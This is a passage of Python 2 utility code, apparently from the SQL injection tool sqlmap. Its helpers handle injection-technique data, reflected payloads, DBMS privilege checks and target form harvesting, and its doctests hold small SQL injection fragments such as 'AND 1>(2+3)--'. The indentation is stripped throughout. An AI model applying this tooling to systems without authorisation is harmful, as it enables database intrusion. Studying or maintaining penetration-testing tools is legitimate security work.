"""
Logs HTTP traffic to the output file
"""
if not conf.trafficFile:
return
with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError
def getPublicTypeMembers(type_, onlyValues=False):
"""
Useful for getting members from types (e.g. in enums)
>>> [_ for _ in getPublicTypeMembers(OS, True)]
['Linux', 'Windows']
"""
for name, value in inspect.getmembers(type_):
if not name.startswith('__'):
if not onlyValues:
yield (name, value)
else:
yield value
def enumValueToNameLookup(type_, value_):
"""
Returns name of a enum member with a given value
>>> enumValueToNameLookup(SORT_ORDER, 100)
'LAST'
"""
retVal = None
for name, value in getPublicTypeMembers(type_):
if value == value_:
retVal = name
break
return retVal
def extractRegexResult(regex, content, flags=0):
"""
Returns 'result' group value from a possible match with regex on a given
content
>>> extractRegexResult(r'a(?P<result>[^g]+)g', 'abcdefg')
'bcdef'
"""
retVal = None
if regex and content and "?P<result>" in regex:
match = re.search(regex, content, flags)
if match:
retVal = match.group("result")
return retVal
def extractTextTagContent(page):
"""
Returns list containing content from "textual" tags
>>> extractTextTagContent(u'<html><head><title>Title</title></head><body><pre>foobar</pre><a href="#link">Link</a></body></html>')
[u'Title', u'foobar']
"""
page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
def trimAlphaNum(value):
"""
Trims alpha numeric characters from start and ending of a given value
>>> trimAlphaNum(u'AND 1>(2+3)-- foobar')
u' 1>(2+3)-- '
"""
while value and value[-1].isalnum():
value = value[:-1]
while value and value[0].isalnum():
value = value[1:]
return value
def isNumPosStrValue(value):
"""
Returns True if value is a string (or integer) with a positive integer representation
>>> isNumPosStrValue(1)
True
>>> isNumPosStrValue('1')
True
>>> isNumPosStrValue(0)
False
>>> isNumPosStrValue('-2')
False
"""
return (value and isinstance(value, basestring) and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)
@cachedmethod
def aliasToDbmsEnum(dbms):
"""
Returns major DBMS name from a given alias
>>> aliasToDbmsEnum('mssql')
'Microsoft SQL Server'
"""
retVal = None
if dbms:
for key, item in DBMS_DICT.items():
if dbms.lower() in item[0] or dbms.lower() == key.lower():
retVal = key
break
return retVal
def findDynamicContent(firstPage, secondPage):
"""
This function checks if the provided pages have dynamic content. If they
are dynamic, proper markings will be made
"""
infoMsg = "searching for dynamic content"
logger.info(infoMsg)
blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
kb.dynamicMarkings = []
# Removing too small matching blocks
for block in blocks[:]:
(_, _, length) = block
if length <= DYNAMICITY_MARK_LENGTH:
blocks.remove(block)
# Making of dynamic markings based on prefix/suffix principle
if len(blocks) > 0:
blocks.insert(0, None)
blocks.append(None)
for i in xrange(len(blocks) - 1):
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
if prefix is None and blocks[i + 1][0] == 0:
continue
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
continue
prefix = trimAlphaNum(prefix)
suffix = trimAlphaNum(suffix)
kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None))
if len(kb.dynamicMarkings) > 0:
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
logger.info(infoMsg)
def removeDynamicContent(page):
"""
Removing dynamic content from supplied page basing removal on
precalculated dynamic markings
"""
if page:
for item in kb.dynamicMarkings:
prefix, suffix = item
if prefix is None and suffix is None:
continue
elif prefix is None:
page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
elif suffix is None:
page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
else:
page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
return page
def filterStringValue(value, charRegex, replacement=""):
"""
Returns string value consisting only of chars satisfying supplied
regular expression (note: it has to be in form [...])
>>> filterStringValue(u'wzydeadbeef0123#', r'[0-9a-f]')
u'deadbeef0123'
"""
retVal = value
if value:
retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value)
return retVal
def filterControlChars(value):
"""
Returns string value with control chars being supstituted with ' '
>>> filterControlChars(u'AND 1>(2+3)\\n--')
u'AND 1>(2+3) --'
"""
return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ')
def isDBMSVersionAtLeast(version):
"""
Checks if the recognized DBMS version is at least the version
specified
"""
retVal = None
if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION:
value = Backend.getVersion().replace(" ", "").rstrip('.')
while True:
index = value.find('.', value.find('.') + 1)
if index > -1:
value = value[0:index] + value[index + 1:]
else:
break
value = filterStringValue(value, '[0-9.><=]')
if isinstance(value, basestring):
if value.startswith(">="):
value = float(value.replace(">=", ""))
elif value.startswith(">"):
value = float(value.replace(">", "")) + 0.01
elif value.startswith("<="):
value = float(value.replace("<=", ""))
elif value.startswith(">"):
value = float(value.replace("<", "")) - 0.01
retVal = getUnicode(value) >= getUnicode(version)
return retVal
def parseSqliteTableSchema(value):
"""
Parses table column names and types from specified SQLite table schema
"""
if value:
table = {}
columns = {}
for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
columns[match.group(1)] = match.group(2)
table[conf.tbl] = columns
kb.data.cachedColumns[conf.db] = table
def getTechniqueData(technique=None):
"""
Returns injection data for technique specified
"""
return kb.injection.data.get(technique)
def isTechniqueAvailable(technique):
"""
Returns True if there is injection data which sqlmap could use for
technique specified
"""
if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech:
return False
else:
return getTechniqueData(technique) is not None
def isStackingAvailable():
"""
Returns True whether techniques using stacking are available
"""
retVal = False
if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data:
retVal = True
else:
for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True):
_ = getTechniqueData(technique)
if _ and "stacked" in _["title"].lower():
retVal = True
break
return retVal
def isInferenceAvailable():
"""
Returns True whether techniques using inference technique are available
"""
return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME))
def setOptimize():
"""
Sets options turned on by switch '-o'
"""
#conf.predictOutput = True
conf.keepAlive = True
conf.threads = 3 if conf.threads < 3 else conf.threads
conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor))
if not conf.nullConnection:
debugMsg = "turning off --null-connection switch used indirectly by switch -o"
logger.debug(debugMsg)
def initTechnique(technique=None):
"""
Prepares data for technique specified
"""
try:
data = getTechniqueData(technique)
resetCounter(technique)
if data:
kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place)
kb.matchRatio = data.matchRatio
kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE)
# Restoring stored conf options
for key, value in kb.injection.conf.items():
if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))):
setattr(conf, key, value)
debugMsg = "resuming configuration option '%s' (%s)" % (key, value)
logger.debug(debugMsg)
if value and key == "optimize":
setOptimize()
else:
warnMsg = "there is no injection data available for technique "
warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique)
logger.warn(warnMsg)
except SqlmapDataException:
errMsg = "missing data in old session file(s). "
errMsg += "Please use '--flush-session' to deal "
errMsg += "with this error"
raise SqlmapNoneDataException(errMsg)
def arrayizeValue(value):
"""
Makes a list out of value if it is not already a list or tuple itself
>>> arrayizeValue(u'1')
[u'1']
"""
if not isListLike(value):
value = [value]
return value
def unArrayizeValue(value):
"""
Makes a value out of iterable if it is a list or tuple itself
>>> unArrayizeValue([u'1'])
u'1'
"""
if isListLike(value):
value = value[0] if len(value) > 0 else None
return value
def flattenValue(value):
"""
Returns an iterator representing flat representation of a given value
>>> [_ for _ in flattenValue([[u'1'], [[u'2'], u'3']])]
[u'1', u'2', u'3']
"""
for i in iter(value):
if isListLike(i):
for j in flattenValue(i):
yield j
else:
yield i
def isListLike(value):
"""
Returns True if the given value is a list-like instance
>>> isListLike([1, 2, 3])
True
>>> isListLike(u'2')
False
"""
return isinstance(value, (list, tuple, set, BigArray))
def getSortedInjectionTests():
"""
Returns prioritized test list by eventually detected DBMS from error
messages
"""
retVal = copy.deepcopy(conf.tests)
def priorityFunction(test):
retVal = SORT_ORDER.FIRST
if test.stype == PAYLOAD.TECHNIQUE.UNION:
retVal = SORT_ORDER.LAST
elif 'details' in test and 'dbms' in test.details:
if test.details.dbms in Backend.getErrorParsedDBMSes():
retVal = SORT_ORDER.SECOND
else:
retVal = SORT_ORDER.THIRD
return retVal
if Backend.getErrorParsedDBMSes():
retVal = sorted(retVal, key=priorityFunction)
return retVal
def filterListValue(value, regex):
"""
Returns list with items that have parts satisfying given regular
expression
>>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)')
['users', 'admins']
"""
if isinstance(value, list) and regex:
retVal = filter(lambda _: re.search(regex, _, re.I), value)
else:
retVal = value
return retVal
def showHttpErrorCodes():
"""
Shows all HTTP error codes raised till now
"""
if kb.httpErrorCodes:
warnMsg = "HTTP error codes detected during run:\n"
warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \
if code in httplib.responses else '?', count) \
for code, count in kb.httpErrorCodes.items())
logger.warn(warnMsg)
def openFile(filename, mode='r'):
"""
Returns file handle of a given filename
"""
try:
return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
except IOError:
errMsg = "there has been a file opening error for filename '%s'. " % filename
errMsg += "Please check %s permissions on a file " % ("write" if \
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
errMsg += "and that it's not locked by another process."
raise SqlmapFilePathException(errMsg)
def decodeIntToUnicode(value):
"""
Decodes inferenced integer value to an unicode character
>>> decodeIntToUnicode(35)
u'#'
>>> decodeIntToUnicode(64)
u'@'
"""
retVal = value
if isinstance(value, int):
try:
if value > 255:
_ = "%x" % value
if len(_) % 2 == 1:
_ = "0%s" % _
retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
else:
retVal = getUnicode(chr(value))
except:
retVal = INFERENCE_UNKNOWN_CHAR
return retVal
def unhandledExceptionMessage():
"""
Returns detailed message about occurred unhandled exception
"""
errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
errMsg += "run with the latest development version from official GitHub "
errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
errMsg += "with the following text and any other information required to "
errMsg += "reproduce the bug. The "
errMsg += "developers will try to reproduce the bug, fix it accordingly "
errMsg += "and get back to you\n"
errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
errMsg += "Python version: %s\n" % PYVERSION
errMsg += "Operating system: %s\n" % PLATFORM
errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
return errMsg
def createGithubIssue(errMsg, excMsg):
"""
Automatically create a Github issue with unhandled exception information
"""
msg = "\ndo you want to automatically create a new (anonymized) issue "
msg += "with the unhandled exception information at "
msg += "the official Github repository? [y/N] "
try:
test = readInput(msg, default="N")
except:
test = None
if test and test[0] in ("y", "Y"):
ex = None
errMsg = errMsg[errMsg.find("\n"):]
data = {"title": "Unhandled exception (#%s)" % hashlib.md5(excMsg).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
try:
f = urllib2.urlopen(req)
content = f.read()
except Exception, ex:
content = None
issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
if issueUrl:
infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
logger.info(infoMsg)
else:
warnMsg = "something went wrong while creating a Github issue"
if ex:
warnMsg += " ('%s')" % ex
logger.warn(warnMsg)
def maskSensitiveData(msg):
"""
Masks sensitive data in the supplied message
"""
retVal = getUnicode(msg)
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
while extractRegexResult(regex, retVal):
value = extractRegexResult(regex, retVal)
retVal = retVal.replace(value, '*' * len(value))
if getpass.getuser():
retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
return retVal
def listToStrValue(value):
"""
Flattens list to a string value
>>> listToStrValue([1,2,3])
'1, 2, 3'
"""
if isinstance(value, (set, tuple)):
value = list(value)
if isinstance(value, list):
retVal = value.__str__().lstrip('[').rstrip(']')
else:
retVal = value
return retVal
def getExceptionFrameLocals():
"""
Returns dictionary with local variable content from frame
where exception has been raised
"""
retVal = {}
if sys.exc_info():
trace = sys.exc_info()[2]
while trace.tb_next:
trace = trace.tb_next
retVal = trace.tb_frame.f_locals
return retVal
def intersect(valueA, valueB, lowerCase=False):
"""
Returns intersection of the array-ized values
>>> intersect([1, 2, 3], set([1,3]))
[1, 3]
"""
retVal = []
if valueA and valueB:
valueA = arrayizeValue(valueA)
valueB = arrayizeValue(valueB)
if lowerCase:
valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA]
valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB]
retVal = [val for val in valueA if val in valueB]
return retVal
def cpuThrottle(value):
"""
Does a CPU throttling for lesser CPU consumption
"""
delay = 0.00001 * (value ** 2)
time.sleep(delay)
def removeReflectiveValues(content, payload, suppressWarning=False):
"""
Neutralizes reflective values in a given content based on a payload
(e.g. ..search.php?q=1 AND 1=2 --> "...searching for <b>1%20AND%201%3D2</b>..." --> "...searching for <b>__REFLECTED_VALUE__</b>...")
"""
retVal = content
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
def _(value):
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
return value
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
if regex != payload:
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
else:
regex = r"\b%s" % regex
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
else:
regex = r"%s\b" % regex
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
if len(parts) > 2:
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
if retVal != content:
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
if not suppressWarning:
warnMsg = "reflective value(s) found and filtering out"
singleTimeWarnMessage(warnMsg)
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
warnMsg += "test those separately in case that attack on this page fails"
singleTimeWarnMessage(warnMsg)
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
kb.reflectiveMechanism = False
if not suppressWarning:
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
logger.debug(debugMsg)
return retVal
def normalizeUnicode(value):
"""
Does an ASCII normalization of unicode strings
Reference: http://www.peterbe.com/plog/unicode-to-ascii
>>> normalizeUnicode(u'\u0161u\u0107uraj')
'sucuraj'
"""
return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value
def safeSQLIdentificatorNaming(name, isTable=False):
"""
Returns a safe representation of SQL identificator name (internal data format)
Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal
"""
retVal = name
if isinstance(name, basestring):
retVal = getUnicode(name)
_ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE)
if _:
retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal)
if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = "`%s`" % retVal.strip("`")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
retVal = "\"%s\"" % retVal.strip("\"")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = "\"%s\"" % retVal.strip("\"").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U):
retVal = "[%s]" % retVal.strip("[]")
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal)
return retVal
def unsafeSQLIdentificatorNaming(name):
"""
Extracts identificator's name from its safe SQL representation
"""
retVal = name
if isinstance(name, basestring):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = name.replace("`", "")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
retVal = name.replace("\"", "")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = name.replace("\"", "").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,):
retVal = name.replace("[", "").replace("]", "")
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
prefix = "%s." % DEFAULT_MSSQL_SCHEMA
if retVal.startswith(prefix):
retVal = retVal[len(prefix):]
return retVal
def isNoneValue(value):
"""
Returns whether the value is unusable (None or '')
>>> isNoneValue(None)
True
>>> isNoneValue('None')
True
>>> isNoneValue('')
True
>>> isNoneValue([])
True
>>> isNoneValue([2])
False
"""
if isinstance(value, basestring):
return value in ("None", "")
elif isListLike(value):
return all(isNoneValue(_) for _ in value)
elif isinstance(value, dict):
return not any(value)
else:
return value is None
def isNullValue(value):
"""
Returns whether the value contains explicit 'NULL' value
>>> isNullValue(u'NULL')
True
>>> isNullValue(u'foobar')
False
"""
return isinstance(value, basestring) and value.upper() == NULL
def expandMnemonics(mnemonics, parser, args):
"""
Expands mnemonic options
"""
class MnemonicNode(object):
def __init__(self):
self.next = {}
self.current = []
head = MnemonicNode()
pointer = None
for group in parser.option_groups:
for option in group.option_list:
for opt in option._long_opts + option._short_opts:
pointer = head
for char in opt:
if char == "-":
continue
elif char not in pointer.next:
pointer.next[char] = MnemonicNode()
pointer = pointer.next[char]
pointer.current.append(option)
for mnemonic in mnemonics.split(','):
found = None
name = mnemonic.split('=')[0].replace("-", "").strip()
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
pointer = head
for char in name:
if char in pointer.next:
pointer = pointer.next[char]
else:
pointer = None
break
if pointer in (None, head):
errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name
raise SqlmapSyntaxException(errMsg)
elif len(pointer.current) > 1:
options = {}
for option in pointer.current:
for opt in option._long_opts + option._short_opts:
opt = opt.strip('-')
if opt.startswith(name):
options[opt] = option
if name in options:
found = name
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
logger.debug(debugMsg)
else:
found = sorted(options.keys(), key=lambda x: len(x))[0]
warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys()))
warnMsg += "Resolved to shortest of those ('%s')" % found
logger.warn(warnMsg)
found = options[found]
else:
found = pointer.current[0]
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
logger.debug(debugMsg)
if found:
try:
value = found.convert_value(found, value)
except OptionValueError:
value = None
if value is not None:
setattr(args, found.dest, value)
elif not found.type: # boolean
setattr(args, found.dest, True)
else:
errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type)
raise SqlmapSyntaxException(errMsg)
def safeCSValue(value):
"""
Returns value safe for CSV dumping
Reference: http://tools.ietf.org/html/rfc4180
>>> safeCSValue(u'foo, bar')
u'"foo, bar"'
>>> safeCSValue(u'foobar')
u'foobar'
"""
retVal = value
if retVal and isinstance(retVal, basestring):
if not (retVal[0] == retVal[-1] == '"'):
if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')):
retVal = '"%s"' % retVal.replace('"', '""')
return retVal
def filterPairValues(values):
"""
Returns only list-like values with length 2
>>> filterPairValues([[1, 2], [3], 1, [4, 5]])
[[1, 2], [4, 5]]
"""
retVal = []
if not isNoneValue(values) and hasattr(values, '__iter__'):
retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values)
return retVal
def randomizeParameterValue(value):
"""
Randomize a parameter value based on occurances of alphanumeric characters
>>> random.seed(0)
>>> randomizeParameterValue('foobar')
'rnvnav'
>>> randomizeParameterValue('17')
'83'
"""
retVal = value
for match in re.finditer('[A-Z]+', value):
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
for match in re.finditer('[a-z]+', value):
retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower())
for match in re.finditer('[0-9]+', value):
retVal = retVal.replace(match.group(), str(randomInt(len(match.group()))))
return retVal
def asciifyUrl(url, forceQuote=False):
"""
Attempts to make a unicode URL usuable with ``urllib/urllib2``.
More specifically, it attempts to convert the unicode object ``url``,
which is meant to represent a IRI, to an unicode object that,
containing only ASCII characters, is a valid URI. This involves:
* IDNA/Puny-encoding the domain name.
* UTF8-quoting the path and querystring parts.
See also RFC 3987.
Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/
>>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com')
u'http://www.xn--uuraj-gxa24d.com'
"""
parts = urlparse.urlsplit(url)
if not parts.scheme or not parts.netloc:
# apparently not an url
return url
if all(char in string.printable for char in url):
return url
# idna-encode domain
hostname = parts.hostname.encode("idna")
# UTF8-quote the other parts. We check each part individually if
# if needs to be quoted - that should catch some additional user
# errors, say for example an umlaut in the username even though
# the path *is* already quoted.
def quote(s, safe):
s = s or ''
# Triggers on non-ascii characters - another option would be:
# urllib.quote(s.replace('%', '')) != s.replace('%', '')
# which would trigger on all %-characters, e.g. "&".
if s.encode("ascii", "replace") != s or forceQuote:
return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe)
return s
username = quote(parts.username, '')
password = quote(parts.password, safe='')
path = quote(parts.path, safe='/')
query = quote(parts.query, safe="&=")
# put everything back together
netloc = hostname
if username or password:
netloc = '@' + netloc
if password:
netloc = ':' + password + netloc
netloc = username + netloc
if parts.port:
netloc += ':' + str(parts.port)
return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment])
def isAdminFromPrivileges(privileges):
"""
Inspects privileges to see if those are comming from an admin user
"""
# In PostgreSQL the usesuper privilege means that the
# user is DBA
retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges)
# In Oracle the DBA privilege means that the
# user is DBA
retVal |= (Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges)
# In MySQL >= 5.0 the SUPER privilege means
# that the user is DBA
retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges)
# In MySQL < 5.0 the super_priv privilege means
# that the user is DBA
retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges)
# In Firebird there is no specific privilege that means
# that the user is DBA
# TODO: confirm
retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE")))
return retVal
def findPageForms(content, url, raise_=False, addToTargets=False):
"""
Parses given page content for possible forms
"""
class _(StringIO):
def __init__(self, content, url):
StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content)
self._url = url
def geturl(self):
return self._url
if not content:
errMsg = "can't parse forms as the page content appears to be blank"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
forms = None
retVal = set()
response = _(content, url)
try:
forms = ParseResponse(response, backwards_compat=False)
except UnicodeError:
pass
except ParseError:
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
logger.warning(warnMsg)
response.seek(0)
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
try:
forms = ParseResponse(filtered, backwards_compat=False)
except ParseError:
errMsg = "no success"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
if forms:
for form in forms:
try:
for control in form.controls:
if hasattr(control, "items") and not control.disabled:
# if control has selectable items select first non-disabled
for item in control.items:
if not item.disabled:
if not item.selected:
item.selected = True
break
request = form.click()
except (ValueError, TypeError), ex:
errMsg = "there has been a problem while "
errMsg += "processing page forms ('%s')" % ex
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
else:
url = urldecode(request.get_full_url(), kb.pageEncoding)
method = request.get_method()
data = request.get_data() if request.has_data() else None
data = urldecode(data, kb.pageEncoding, plusspace=False)
if not data and method and method.upper() == HTTPMETHOD.POST:
debugMsg = "invalid POST form with blank data detected"
logger.debug(debugMsg)
continue
target = (url, method, data, conf.cookie, None)
retVal.add(target)
else:
errMsg = "there were no forms found at the given target URL"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
if addToTargets and retVal:
for target in retVal:
url = target[0]
# flag to know if we are dealing with the same target host
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
if conf.scope:
if not re.search(conf.scope, url, re.I):
continue
elif not _:
continue
kb.targets.add(target)
return retVal
def getHostHeader(url):
"""
Returns proper Host header value for a given target URL
>>> getHostHeader('http://www.target.com/vuln.php?id=1')
'www.target.com'
"""
retVal = url
if url:
retVal = urlparse.urlparse(url).netloc
if re.search("http(s)?://\[.+\]", url, re.I):
retVal = extractRegexResult("http(s)?://\[(?P<result>.+)\]", url)
elif any(retVal.endswith(':%d' % _) for _ in (80, 443)):
retVal = retVal.split(':')[0]
return retVal
def checkDeprecatedOptions(args):
"""
Checks for deprecated options
"""
for _ in args:
if _ in DEPRECATED_OPTIONS:
errMsg = "switch/option '%s' is deprecated" % _
if DEPRECATED_OPTIONS[_]:
errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_]
raise SqlmapSyntaxException(errMsg)
def checkSystemEncoding():
"""
Checks for problematic encodings
"""
if sys.getdefaultencoding() == "cp720":
try:
codecs.lookup("cp720")
except LookupError:
errMsg = "there is a known Python issue (#1616979) related "
errMsg += "to support for charset 'cp720'. Please visit "
errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' "
errMsg += "and follow the instructions to be able to fix it"
logger.critical(errMsg)
warnMsg = "temporary switching to charset 'cp1256'"
logger.warn(warnMsg)
reload(sys)
sys.setdefaultencoding("cp1256")
def evaluateCode(code, variables=None):
"""
Executes given python code given in a string form
"""
try:
exec(code, variables)
except KeyboardInterrupt:
raise
except Exception, ex:
errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
raise SqlmapGenericException(errMsg)
def serializeObject(object_):
"""
